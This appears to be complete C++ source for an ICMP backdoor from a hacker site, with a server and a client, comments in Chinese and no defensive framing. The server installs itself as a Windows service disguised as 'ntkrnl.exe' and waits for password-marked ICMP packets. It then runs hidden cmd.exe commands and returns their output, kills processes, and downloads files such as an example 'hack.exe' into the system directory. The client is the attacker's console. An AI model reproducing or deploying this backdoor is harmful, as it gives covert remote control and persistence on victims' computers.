IcmpBackDoor
服务端(Server.cpp):
1 #include <winsock2.h> 2 #include <stdio.h> 3 #include <urlmon.h> 4 #include <tlhelp32.h> 5 #pragma comment(lib, "Urlmon.lib") 6 #pragma comment(lib, "ws2_32.lib") 7 8 #define ICMP_PASSWORD 1234 9 #define STATUS_FAILED 0xFFFF 10 #define MAX_PACKET 6500 11 #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) 12 13 /* The IP header */ 14 typedef struct iphdr { 15 unsigned int h_len:4; //4位首部长度 16 unsigned int version:4; //IP版本号,4表示IPV4 17 unsigned char tos; //8位服务类型TOS 18 unsigned short total_len; //16位总长度(字节) 19 unsigned short ident; //16位标识 20 unsigned short frag_and_flags; //3位标志位 21 unsigned char ttl; //8位生存时间 TTL 22 unsigned char proto; //8位协议 (TCP, UDP 或其他) 23 unsigned short checksum; //16位IP首部校验和 24 unsigned int sourceIP; //32位源IP地址 25 unsigned int destIP; //32位目的IP地址 26 }IpHeader; 27 28 //定义ICMP首部 29 typedef struct _ihdr 30 { 31 BYTE i_type; //8位类型 32 BYTE i_code; //8位代码 33 USHORT i_cksum; //16位校验和 34 USHORT i_id; //识别号(一般用进程号作为识别号) 35 USHORT i_seq; //报文序列号 36 ULONG timestamp; //时间戳 37 }IcmpHeader; 38 char arg[256]; 39 char buffer[2048] = {0};//管道输出的数据 40 void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数 41 void fill_icmp_data(char * icmp_data); 42 void pslist(void); 43 BOOL killps(DWORD id);//杀进程函数 44 void send(void); 45 char *ICMP_DEST_IP; 46 USHORT checksum(USHORT *buffer, int size); 47 48 HANDLE hMutex; 49 SERVICE_STATUS ServiceStatus; 50 SERVICE_STATUS_HANDLE ServiceStatusHandle; 51 void WINAPI ICMP_CmdStart(DWORD,LPTSTR *); 52 void WINAPI CmdControl(DWORD); 53 DWORD WINAPI CmdService(LPVOID); 54 void InstallCmdService(void); 55 void RemoveCmdService(void); 56 void usage(char *par); 57 int main(int argc,char *argv[]) 58 { 59 SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}}; 60 if(argc==2) 61 { 62 if(!stricmp(argv[1],"-install")) 63 { 64 //usage(argv[0]); 65 InstallCmdService(); 66 printf("InstallCmdService\n"); 67 } 68 else if(!stricmp(argv[1],"-remove")) 69 { 70 //usage(argv[0]); 71 RemoveCmdService(); 72 printf("RemoveCmdService\n"); 73 } 74 else usage(argv[0]); 75 return 0; 76 } 77 else usage(argv[0]); 78 79 80 StartServiceCtrlDispatcher(DispatchTable); 81 return 0; 82 } 83 void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv) 84 { 85 HANDLE hThread; 86 ServiceStatus.dwServiceType = SERVICE_WIN32; 87 ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 88 ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE; 89 ServiceStatus.dwServiceSpecificExitCode = 0; 90 ServiceStatus.dwWin32ExitCode = 0; 91 ServiceStatus.dwCheckPoint = 0; 92 ServiceStatus.dwWaitHint = 0; 93 ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl); 94 if(ServiceStatusHandle==0) 95 { 96 OutputDebugString("RegisterServiceCtrlHandler Error !\n"); 97 return ; 98 } 99 ServiceStatus.dwCurrentState = SERVICE_RUNNING; 100 ServiceStatus.dwCheckPoint = 0; 101 ServiceStatus.dwWaitHint = 0; 102 103 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 104 { 105 OutputDebugString("SetServiceStatus in CmdStart Error !\n"); 106 return ; 107 } 108 hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL); 109 if(hThread==NULL) 110 { 111 OutputDebugString("CreateThread in CmdStart Error !\n"); 112 } 113 return ; 114 } 115 void WINAPI CmdControl(DWORD dwCode) 116 { 117 switch(dwCode) 118 { 119 case SERVICE_CONTROL_PAUSE: 120 ServiceStatus.dwCurrentState = SERVICE_PAUSED; 121 break; 122 case SERVICE_CONTROL_CONTINUE: 123 ServiceStatus.dwCurrentState = SERVICE_RUNNING; 124 break; 125 case SERVICE_CONTROL_STOP: 126 WaitForSingleObject(hMutex,INFINITE); 127 ServiceStatus.dwCurrentState = SERVICE_STOPPED; 128 ServiceStatus.dwWin32ExitCode = 0; 129 ServiceStatus.dwCheckPoint = 0; 130 ServiceStatus.dwWaitHint = 0; 131 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 132 { 133 OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n"); 134 } 135 ReleaseMutex(hMutex); 136 CloseHandle(hMutex); 137 return ; 138 case SERVICE_CONTROL_INTERROGATE: 139 break; 140 default: 141 break; 142 } 143 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 144 { 145 OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n"); 146 } 147 return ; 148 } 149 DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务 150 { 151 char *icmp_data; 152 int bread,datasize,retval; 153 SOCKET sockRaw = (SOCKET)NULL; 154 WSADATA wsaData; 155 struct sockaddr_in dest,from; 156 int fromlen = sizeof(from); 157 int timeout = 2000; 158 char *recvbuf; 159 160 if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) 161 { 162 printf("WSAStartup failed: %s\n",retval); 163 ExitProcess(STATUS_FAILED); 164 } 165 sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED); 166 if (sockRaw == INVALID_SOCKET) 167 { 168 printf("WSASocket() failed: %s\n",WSAGetLastError()); 169 ExitProcess(STATUS_FAILED); 170 } 171 __try{ 172 bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout)); 173 if(bread == SOCKET_ERROR) __leave; 174 175 memset(&dest,0,sizeof(dest)); 176 dest.sin_family = AF_INET; 177 datasize=0; 178 datasize += sizeof(IcmpHeader); 179 icmp_data =(char*)xmalloc(MAX_PACKET); 180 recvbuf = (char*)xmalloc(MAX_PACKET); 181 if (!icmp_data) { 182 //fprintf(stderr,"HeapAlloc failed %d\n",GetLastError()); 183 __leave; 184 } 185 memset(icmp_data,0,MAX_PACKET); 186 for(;;) { 187 int bwrote; 188 bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); 189 bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen); 190 if (bread == SOCKET_ERROR) 191 { 192 if (WSAGetLastError() == WSAETIMEDOUT)continue; 193 __leave; 194 } 195 decode_resp(recvbuf,bread,&from); 196 Sleep(200); 197 memset(recvbuf,0,sizeof(recvbuf)); 198 } 199 } 200 __finally { 201 if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 202 WSACleanup(); 203 } 204 return 0; 205 } 206 207 208 void InstallCmdService(void) 209 { 210 SC_HANDLE schSCManager; 211 SC_HANDLE schService; 212 char lpCurrentPath[MAX_PATH]; 213 char lpImagePath[MAX_PATH]; 214 char *lpHostName; 215 WIN32_FIND_DATA FileData; 216 HANDLE hSearch; 217 DWORD dwErrorCode; 218 SERVICE_STATUS InstallServiceStatus; 219 220 GetSystemDirectory(lpImagePath,MAX_PATH); 221 strcat(lpImagePath,"\\ntkrnl.exe"); 222 lpHostName=NULL; 223 224 printf("Transmitting File ... "); 225 hSearch=FindFirstFile(lpImagePath,&FileData); 226 if(hSearch==INVALID_HANDLE_VALUE) 227 { 228 GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); 229 if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 230 { 231 dwErrorCode=GetLastError(); 232 if(dwErrorCode==5) 233 { 234 printf("Failure ... Access is Denied !\n"); 235 } 236 else 237 { 238 printf("Failure !\n"); 239 } 240 return ; 241 } 242 else 243 { 244 printf("Success !\n"); 245 } 246 } 247 else 248 { 249 printf("already Exists !\n"); 250 FindClose(hSearch); 251 } 252 schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); 253 if(schSCManager==NULL) 254 { 255 printf("Open Service Control Manager Database Failure !\n"); 256 return ; 257 } 258 printf("Creating Service .... "); 259 schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS, 260 SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, 261 SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 262 if(schService==NULL) 263 { 264 dwErrorCode=GetLastError(); 265 if(dwErrorCode!=ERROR_SERVICE_EXISTS) 266 { 267 printf("Failure !\n"); 268 CloseServiceHandle(schSCManager); 269 return ; 270 } 271 else 272 { 273 printf("already Exists !\n"); 274 schService=OpenService(schSCManager,"ntkrnl",SERVICE_START); 275 if(schService==NULL) 276 { 277 printf("Opening Service .... Failure !\n"); 278 CloseServiceHandle(schSCManager); 279 return ; 280 } 281 } 282 } 283 else 284 { 285 printf("Success !\n"); 286 } 287 printf("Starting Service .... "); 288 if(StartService(schService,0,NULL)==0) 289 { 290 dwErrorCode=GetLastError(); 291 if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING) 292 { 293 printf("already Running !\n"); 294 CloseServiceHandle(schSCManager); 295 CloseServiceHandle(schService); 296 return ; 297 } 298 } 299 else 300 { 301 printf("Pending ... "); 302 } 303 while(QueryServiceStatus(schService,&InstallServiceStatus)!=0) 304 { 305 if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING) 306 { 307 Sleep(100); 308 } 309 else 310 { 311 break; 312 } 313 } 314 if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING) 315 { 316 printf("Failure !\n"); 317 } 318 else 319 { 320 printf("Success !\n"); 321 } 322 CloseServiceHandle(schSCManager); 323 CloseServiceHandle(schService); 324 return ; 325 } 326 void RemoveCmdService(void) 327 { 328 SC_HANDLE schSCManager; 329 SC_HANDLE schService; 330 char lpImagePath[MAX_PATH]; 331 char *lpHostName; 332 WIN32_FIND_DATA FileData; 333 SERVICE_STATUS RemoveServiceStatus; 334 HANDLE hSearch; 335 DWORD dwErrorCode; 336 337 GetSystemDirectory(lpImagePath,MAX_PATH); 338 strcat(lpImagePath,"\\ntkrnl.exe"); 339 lpHostName=NULL; 340 341 schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); 342 if(schSCManager==NULL) 343 { 344 printf("Opening SCM ......... "); 345 dwErrorCode=GetLastError(); 346 if(dwErrorCode!=5) 347 { 348 printf("Failure !\n"); 349 } 350 else 351 { 352 printf("Failuer ... Access is Denied !\n"); 353 } 354 return ; 355 } 356 schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS); 357 if(schService==NULL) 358 { 359 printf("Opening Service ..... "); 360 dwErrorCode=GetLastError(); 361 if(dwErrorCode==1060) 362 { 363 printf("no Exists !\n"); 364 } 365 else 366 { 367 printf("Failure !\n"); 368 } 369 CloseServiceHandle(schSCManager); 370 } 371 else 372 { 373 printf("Stopping Service .... "); 374 if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0) 375 { 376 if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) 377 { 378 printf("already Stopped !\n"); 379 } 380 else 381 { 382 printf("Pending ... "); 383 if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0) 384 { 385 while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING) 386 { 387 Sleep(10); 388 QueryServiceStatus(schService,&RemoveServiceStatus); 389 } 390 if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) 391 { 392 printf("Success !\n"); 393 } 394 else 395 { 396 printf("Failure !\n"); 397 } 398 } 399 else 400 { 401 printf("Failure !\n"); 402 } 403 } 404 } 405 else 406 { 407 printf("Query Failure !\n"); 408 } 409 printf("Removing Service .... "); 410 if(DeleteService(schService)==0) 411 { 412 printf("Failure !\n"); 413 } 414 else 415 { 416 printf("Success !\n"); 417 } 418 } 419 CloseServiceHandle(schSCManager); 420 CloseServiceHandle(schService); 421 printf("Removing File ....... "); 422 Sleep(1500); 423 hSearch=FindFirstFile(lpImagePath,&FileData); 424 if(hSearch==INVALID_HANDLE_VALUE) 425 { 426 printf("no Exists !\n"); 427 } 428 else 429 { 430 if(DeleteFile(lpImagePath)==0) 431 { 432 printf("Failure !\n"); 433 } 434 else 435 { 436 printf("Success !\n"); 437 } 438 FindClose(hSearch); 439 } 440 return ; 441 } 442 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 443 { 444 445 IpHeader *iphdr; 446 IcmpHeader *icmphdr; 447 unsigned short iphdrlen; 448 iphdr = (IpHeader *)buf; 449 iphdrlen = iphdr->h_len * 4 ; 450 icmphdr = (IcmpHeader*)(buf + iphdrlen); 451 if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段 452 { 453 ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址 454 memcpy(arg,buf+iphdrlen+12,256); 455 if (!memcmp(arg,"pskill",6)) 456 { 457 killps(atoi(strstr(arg," "))); 458 memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!")); 459 send(); 460 } 461 462 else if (!memcmp(arg,"pslist",6)){pslist();send();} 463 else if (!strcmp(arg,"remove\n")) 464 { 465 RemoveCmdService(); 466 memcpy(buffer,"Service Removed!",sizeof("Service Removed!")); 467 send(); 468 return; 469 } 470 ////////////************ http下载 ************* 471 else if (!memcmp(arg,"http://",7)) 472 { 473 if(char *FileName=strstr(arg,"-")) 474 { 475 476 char url[200];//保存网址的数组 477 memset(url,0,200); 478 memcpy(url,arg,int(FileName-arg-1)); 479 char fname[MAX_PATH]; 480 GetSystemDirectory(fname,MAX_PATH); 481 FileName++; 482 strcat(fname,"//"); 483 strcat(fname,FileName); 484 *strstr(fname,"\n")=NULL; 485 HRESULT hRet=URLDownloadToFile(0,url,fname,0,0); 486 memset(buffer,0,sizeof(buffer)); 487 if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n")); 488 else 489 memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n")); 490 send(); 491 return; 492 } 493 } 494 //******************************************* 495 else{ 496 SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出 497 HANDLE hRead,hWrite; 498 sa.nLength = sizeof(SECURITY_ATTRIBUTES); 499 sa.lpSecurityDescriptor = NULL; 500 sa.bInheritHandle = TRUE; 501 if (!CreatePipe(&hRead,&hWrite,&sa,0)) 502 { 503 printf("Error On CreatePipe()"); 504 return; 505 } 506 507 STARTUPINFO si; 508 PROCESS_INFORMATION pi; 509 si.cb = sizeof(STARTUPINFO); 510 GetStartupInfo(&si); 511 si.hStdError = hWrite; 512 si.hStdOutput = hWrite; 513 si.wShowWindow = SW_HIDE; 514 si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 515 char cmdline[270]; 516 GetSystemDirectory(cmdline,MAX_PATH+1); 517 strcat(cmdline,"//cmd.exe /c"); 518 strcat(cmdline,arg); 519 if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 520 { 521 printf("Error on CreateProcess()"); 522 return; 523 } 524 CloseHandle(hWrite); 525 526 527 DWORD bytesRead; 528 for(;;){ 529 if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break; 530 Sleep(200); 531 } 532 //printf("%s",buffer); 533 ///////////////////////////////////////////// 534 //发送输出数据 535 send(); 536 } 537 //////////////////////////////////////////////// 538 539 } 540 //else printf("Other ICMP Packets!\n"); 541 //printf(endl; 542 } 543 544 545 USHORT checksum(USHORT *buffer, int size) 546 { 547 unsigned long cksum=0; 548 while(size >1) 549 { 550 cksum+=*buffer++; 551 size -=sizeof(USHORT); 552 } 553 if(size ) { 554 cksum += *(UCHAR*)buffer; 555 } 556 cksum = (cksum >> 16) + (cksum & 0xffff); 557 cksum += (cksum >>16); 558 return (USHORT)(~cksum); 559 } 560 561 void fill_icmp_data(char * icmp_data) 562 { 563 IcmpHeader *icmp_hdr; 564 char *datapart; 565 icmp_hdr = (IcmpHeader*)icmp_data; 566 icmp_hdr->i_type = 0; 567 icmp_hdr->i_code = 0; 568 icmp_hdr->i_id = (USHORT) GetCurrentProcessId(); 569 icmp_hdr->i_cksum = 0; 570 icmp_hdr->i_seq =4321; 571 icmp_hdr->timestamp = GetTickCount(); //设置时间戳 572 datapart = icmp_data + sizeof(IcmpHeader); 573 memcpy(datapart,buffer,strlen(buffer)); 574 //for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 575 } 576 void usage(char *par) 577 { 578 printf("\t\t=====Welcome to www.hackerxfiles.net======\n"); 579 printf("\n"); 580 printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n"); 581 printf("\t\t---[ E-mail: gxisone@hotmail.com ]---\n"); 582 printf("\t\t---[ 2003/8/15 ]---\n"); 583 printf("\n"); 584 printf("\t\tUsage: %s -install (to install service)\n",par); 585 printf("\t\t %s -remove (to remove service)\n",par); 586 printf("\n"); 587 return ; 588 589 } 590 void send(void) 591 { 592 WSADATA wsaData; 593 SOCKET sockRaw = (SOCKET)NULL; 594 struct sockaddr_in dest; 595 int bread,datasize,retval,bwrote; 596 int timeout = 1000; 597 char *icmp_data; 598 if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED); 599 if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED)) 600 ==INVALID_SOCKET) ExitProcess(STATUS_FAILED); 601 __try 602 { 603 if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave; 604 //设置发送超时 605 memset(&dest,0,sizeof(dest)); 606 dest.sin_family = AF_INET; 607 dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); 608 datasize=strlen(buffer); 609 datasize+=sizeof(IcmpHeader); 610 icmp_data=(char*)xmalloc(MAX_PACKET); 611 if(!icmp_data) __leave; 612 memset(icmp_data,0,MAX_PACKET); 613 fill_icmp_data(icmp_data); //填充ICMP报文 614 ((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和 615 bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文 616 if (bwrote == SOCKET_ERROR) 617 { 618 //if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n"); 619 //printf("sendto failed:"<<WSAGetLastError()<<endl; 620 __leave; 621 } 622 //printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl; 623 } 624 625 __finally 626 { 627 if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 628 WSACleanup(); 629 } 630 memset(buffer,0,sizeof(buffer)); 631 Sleep(200); 632 } 633 void pslist(void) 634 { 635 HANDLE hProcessSnap = NULL; 636 PROCESSENTRY32 pe32= {0}; 637 hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 638 if (hProcessSnap == (HANDLE)-1) 639 { 640 printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError()); 641 return ; 642 } 643 pe32.dwSize = sizeof(PROCESSENTRY32); 644 printf("\nProcessName ProcessID"); 645 if (Process32First(hProcessSnap, &pe32)) 646 { 647 char a[5]; 648 do 649 { 650 strcat(buffer,pe32.szExeFile); 651 strcat(buffer,"\t\t"); 652 itoa(pe32.th32ProcessID,a,10); 653 strcat(buffer,a); 654 strcat(buffer,"\n"); 655 //printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID); 656 } 657 while (Process32Next(hProcessSnap, &pe32)); 658 } 659 else 660 { 661 printf("\nProcess32Firstt() failed:%d",GetLastError()); 662 } 663 CloseHandle (hProcessSnap); 664 return; 665 } 666 BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限 667 { 668 TOKEN_PRIVILEGES tp; 669 LUID luid; 670 if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) 671 { 672 printf("\nLookupPrivilegeValue error:%d", GetLastError() ); 673 return FALSE; 674 } 675 tp.PrivilegeCount = 1; 676 tp.Privileges[0].Luid = luid; 677 if (bEnablePrivilege) 678 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 679 else 680 tp.Privileges[0].Attributes = 0; 681 // Enable the privilege or disable all privileges. 682 AdjustTokenPrivileges( 683 hToken, 684 FALSE, 685 &tp, 686 sizeof(TOKEN_PRIVILEGES), 687 (PTOKEN_PRIVILEGES) NULL, 688 (PDWORD) NULL); 689 // Call GetLastError to determine whether the function succeeded. 690 if (GetLastError() != ERROR_SUCCESS) 691 { 692 printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 693 return FALSE; 694 } 695 return TRUE; 696 } 697 //////////////////////////////////////////////////////////////////////////// 698 BOOL killps(DWORD id)//杀进程函数 699 { 700 HANDLE hProcess=NULL,hProcessToken=NULL; 701 BOOL IsKilled=FALSE,bRet=FALSE; 702 __try 703 { 704 if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)) 705 { 706 printf("\nOpen Current Process Token failed:%d",GetLastError()); 707 __leave; 708 } 709 //printf("\nOpen Current Process Token ok!"); 710 if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)) 711 { 712 __leave; 713 } 714 printf("\nSetPrivilege ok!"); 715 if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL) 716 { 717 printf("\nOpen Process %d failed:%d",id,GetLastError()); 718 __leave; 719 } 720 //printf("\nOpen Process %d ok!",id); 721 if(!TerminateProcess(hProcess,1)) 722 { 723 printf("\nTerminateProcess failed:%d",GetLastError()); 724 __leave; 725 } 726 IsKilled=TRUE; 727 } 728 __finally 729 { 730 if(hProcessToken!=NULL) CloseHandle(hProcessToken); 731 if(hProcess!=NULL) CloseHandle(hProcess); 732 } 733 return(IsKilled); 734 }
客户端(Client.cpp):
1 #include <winsock2.h> 2 #include <stdio.h> 3 #include <stdlib.h> 4 #pragma comment(lib,"ws2_32.lib") 5 char SendMsg[256]; 6 /* The IP header */ 7 typedef struct iphdr { 8 unsigned int h_len:4; //4位首部长度 9 unsigned int version:4; //IP版本号,4表示IPV4 10 unsigned char tos; //8位服务类型TOS 11 unsigned short total_len; //16位总长度(字节) 12 unsigned short ident; //16位标识 13 unsigned short frag_and_flags; //3位标志位 14 unsigned char ttl; //8位生存时间 TTL 15 unsigned char proto; //8位协议 (TCP, UDP 或其他) 16 unsigned short checksum; //16位IP首部校验和 17 unsigned int sourceIP; //32位源IP地址 18 unsigned int destIP; //32位目的IP地址 19 }IpHeader; 20 21 22 typedef struct _ihdr 23 { 24 BYTE i_type;//8位类型 25 BYTE i_code; //8位代码 26 USHORT i_cksum;//16位校验和 27 USHORT i_id;//识别号(一般用进程号作为识别号) 28 USHORT i_seq;//报文序列号 29 ULONG timestamp;//时间截 30 } IcmpHeader; 31 #define STATUS_FAILED 0xFFFF 32 33 #define MAX_PACKET 2000 34 char arg[1450]; 35 #define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s)) 36 37 void fill_icmp_data(char *, int); 38 USHORT checksum(USHORT *, int); 39 void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数 40 void help(void); 41 void usage(char * prog); 42 int main(int argc, char *argv[]) 43 { 44 char *ICMP_DEST_IP; //目标主机的IP 45 char *recvbuf; 46 if(argc!=2) 47 { 48 usage(argv[0]); 49 return 0; 50 } 51 ICMP_DEST_IP=argv[1];//取得目标主机IP 52 WSADATA wsaData; 53 SOCKET sockRaw; 54 struct sockaddr_in dest,from; 55 int datasize; 56 int fromlen=sizeof(from); 57 char *icmp_data; 58 59 60 if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) 61 { 62 fprintf(stderr, "WSAStartup failed: %d\n", GetLastError()); 63 ExitProcess(STATUS_FAILED); 64 } 65 sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); 66 int timeout=1000; 67 setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout)); 68 timeout=4000; 69 setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout)); 70 memset(&dest,0,sizeof(dest)); 71 dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP); 72 dest.sin_family=AF_INET; 73 usage(argv[0]); 74 __try{ 75 for(;;){ 76 printf("ICMP-CMD>"); 77 fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中 78 if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0); 79 if(!strcmp(SendMsg,"\n"))continue; 80 if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;} 81 if(!memcmp(SendMsg,"http://",7)) 82 if(!strstr(SendMsg,"-")){ 83 printf("\nFileName Error. Use "); 84 continue; 85 } 86 datasize=strlen(SendMsg); 87 datasize+=sizeof(IcmpHeader); 88 printf("ICMP packet size is %d",datasize); 89 icmp_data= (char*)xmalloc(MAX_PACKET); 90 recvbuf= (char *)xmalloc(MAX_PACKET); 91 memset(icmp_data,0, MAX_PACKET); 92 fill_icmp_data(icmp_data, datasize); 93 ((IcmpHeader *)icmp_data)->i_cksum=0; 94 ((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize); 95 int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest)); 96 if (bwrote == SOCKET_ERROR) 97 { 98 if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n"); 99 fprintf(stderr,"sendto failed: %d\n",WSAGetLastError()); 100 } 101 if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。 102 return 0; 103 } 104 printf("\nSend Packet to %s Success!\n",argv[1]); 105 DWORD start = GetTickCount(); 106 for(;;){ 107 if((GetTickCount() - start) >= 1000) break; 108 memset(recvbuf,0,MAX_PACKET); 109 int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen); 110 if(bread == SOCKET_ERROR) 111 { 112 if(WSAGetLastError() == WSAETIMEDOUT) 113 { 114 printf("timed out\n"); 115 break; 116 } 117 fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError()); 118 break; 119 } 120 decode_resp(recvbuf, bread, &from); 121 } 122 }//end for 123 }//end try 124 125 126 __finally 127 { 128 if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 129 WSACleanup(); 130 } 131 return 0; 132 } 133 134 USHORT checksum(USHORT *buffer, int size) 135 { 136 unsigned long cksum=0; 137 while(size > 1) 138 { 139 cksum+=*buffer++; 140 size-=sizeof(USHORT); 141 } 142 if(size) 143 { 144 cksum+=*(UCHAR *)buffer; 145 } 146 cksum=(cksum >> 16) + (cksum & 0xffff); 147 cksum+=(cksum >> 16); 148 return(USHORT) (~cksum); 149 } 150 void fill_icmp_data(char *icmp_data, int datasize) 151 { 152 IcmpHeader *icmp_hdr; 153 char *datapart; 154 icmp_hdr= (IcmpHeader *)icmp_data; 155 icmp_hdr->i_type=0; 156 icmp_hdr->i_code=0; 157 icmp_hdr->i_id=(USHORT)GetCurrentProcessId(); 158 icmp_hdr->timestamp =GetTickCount(); 159 icmp_hdr->i_seq=1234; 160 datapart=icmp_data + sizeof(IcmpHeader); 161 memcpy(datapart,SendMsg,sizeof(SendMsg)); 162 } 163 void usage(char * prog) 164 { 165 printf("\t\t=====Welcome to www.hackerxfiles.net======\n"); 166 printf("\n"); 167 printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n"); 168 printf("\t\t---[ E-mail: gxisone@hotmail.com ]---\n"); 169 printf("\t\t---[ 2003/8/15 ]---\n"); 170 printf("\t\tusage: %s RemoteIP\n",prog); 171 printf("\t\tCtrl+C or Q/q to Quite H/h for help\n"); 172 } 173 174 175 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 176 { 177 memset(arg,0,sizeof(arg)); 178 IpHeader *iphdr; 179 IcmpHeader *icmphdr; 180 unsigned short iphdrlen; 181 iphdr = (IpHeader *)buf; 182 iphdrlen = iphdr->h_len * 4 ; 183 icmphdr = (IcmpHeader*)(buf + iphdrlen); 184 if(icmphdr->i_seq==4321)//密码正确则输出数据段 185 { 186 printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr)); 187 printf(" IcmpType %d",icmphdr->i_type); 188 printf(" IcmpCode %d",icmphdr->i_code); 189 printf("\n"); 190 memcpy(arg,buf+iphdrlen+12,1450); 191 printf("%s",arg); 192 } 193 else 194 printf("Other ICMP Packets!\n"); 195 } 196 void help(void) 197 { 198 printf("\n"); 199 printf("[http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is ////system32)\n"); 200 printf("[pslist] (List the Process)\n"); 201 printf("[pskill ID] (Kill the Process)\n"); 202 printf("Command (run the command)\n"); 203 printf("\n"); 204 205 }